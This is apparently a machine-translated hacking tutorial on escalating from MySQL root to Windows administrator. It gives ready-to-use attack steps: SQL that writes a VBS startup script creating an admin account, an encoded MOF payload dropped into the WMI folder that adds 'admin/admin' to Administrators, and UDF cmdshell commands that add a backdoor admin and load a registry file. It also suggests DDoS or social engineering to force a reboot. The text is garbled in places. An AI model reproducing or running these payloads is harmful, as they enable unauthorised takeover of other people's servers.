Usually root, know MySQL root, root account password
Start Item Right:
Principle: Write a VBS script to the startup item with a high-privileged root, and then use methods such as DDoS, social worker, etc. to get the server to restart, run the script, and achieve the extraction purpose.
1. See what data tables we enter into the database
Mysql>show tables;
By default, there is no table in test.
The following are the key sections
2, create a new table under the test database;
Mysql>create Table A (cmd text);
Well, we've created a new table with a table named A, with only one field in the table, and a field named cmd, text for text.
3. Inserting content into a table
Mysql>insert into a values ("Set Wshshell=createobject (" "Wscript.Shell" ")");
Mysql>insert into a values ("A=wshshell.run (" "cmd.exe/c net User 1 1/add" ", 0)");
Mysql>insert into a values ("B=wshshell.run (" "Cmd.exe/c net localgroup Administrators 1/add" ", 0)");
Note the double quotes and parentheses, and the following "0" must be entered! We will use these three commands to create a VBS script!
4. Okay, now let's see what's in Table A.
Mysql>select * from A;
We will see three rows of data in the table, which is what we just entered, confirming that you entered the content correctly after we came to the next
5. The output table is a VBS script file
Mysql>select * from A to outfile "c://docume~1//administrator//" start "menu//program//Start//digo8.vbs";
6. Reboot!
MOF right to withdraw:
MySQL MOF Vulnerability Description:
http://www.exploit-db.com/exploits/23083/
Http://www.exploit-db.com/sploits/23083.zip
The MOF file contents are:
#pragma namespace ("\\\\.\\root\\subscription")
Instance of __EventFilter as $EventFilter
{
Eventnamespace = "root\\cimv2";
Name = "FiltP2";
Query = "SELECT * from __InstanceModificationEvent"
"Where targetinstance Isa \" Win32_localtime\ ""
"And Targetinstance.second = 5";
QueryLanguage = "WQL";
};
Instance of Activescripteventconsumer as $Consumer
{
Name = "ConsPCSV2";
Scriptingengine = "JScript";
ScriptText =
"var WSH = new ActiveXObject (\" Wscript.shell\ ") \nwsh.run (\" Net.exe user admin admin/add\ ")";
};
Instance of __filtertoconsumerbinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
The effect is to add a user admin password admin;
Select char ( 35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98 , 115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,11 6,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101 , 110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97 , 109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,11 6,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,1 10,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,1 10,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,3 2,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32 , 32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,9 7,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114 , 32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,6 7,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105 , 112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,3 2,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108 , 108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112 , 32, 97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116 , 97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,10 3,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32 , 32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into DumpFile ' C:/windows/system32/wbem/mof/nullevt.mof ';
The
effect is to add a user admin password admin; Administrative Group
SELECT CHAR ( 35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98 , 115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,11 6,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101 , 110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97 , 109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,11 6,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,1 10,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,1 10,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,3 2,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32 , 32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,9 7,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114 , 32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,6 7,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105 , 112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,3 2,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108 , 108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110 , 32,97,100,109,105,110,32,47,97,100, 100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114 , 84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101 , 114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101 , 110,116,70,105,108,116,101,114,59,13,10,125,59) into DumpFile ' c:/windows/system32/wbem/mof/nullevt.mof ';
Now by default it will be added to the user 5s once, the workaround is:
The first net stop WinMgmt stops the service,
Second Delete folder: C:\WINDOWS\system32\wbem\Repository\
Third net start WinMgmt startup service
UDF right, recommend a script of the dark Month
Of course, you can directly connect the database under DOS, execute the following statements, the same way
Create function Cmdshell returns string Soname ' Udf.dll '
Select Cmdshell (' net user iis_user [email protected] #abcABC/add ');
Select Cmdshell (' net localgroup Administrators Iis_user/add ');
Select Cmdshell (' regedit/s d:web3389.reg ');
Drop function Cmdshell;
Select Cmdshell (' Netstat-an ');
How to use MySQL to raise weights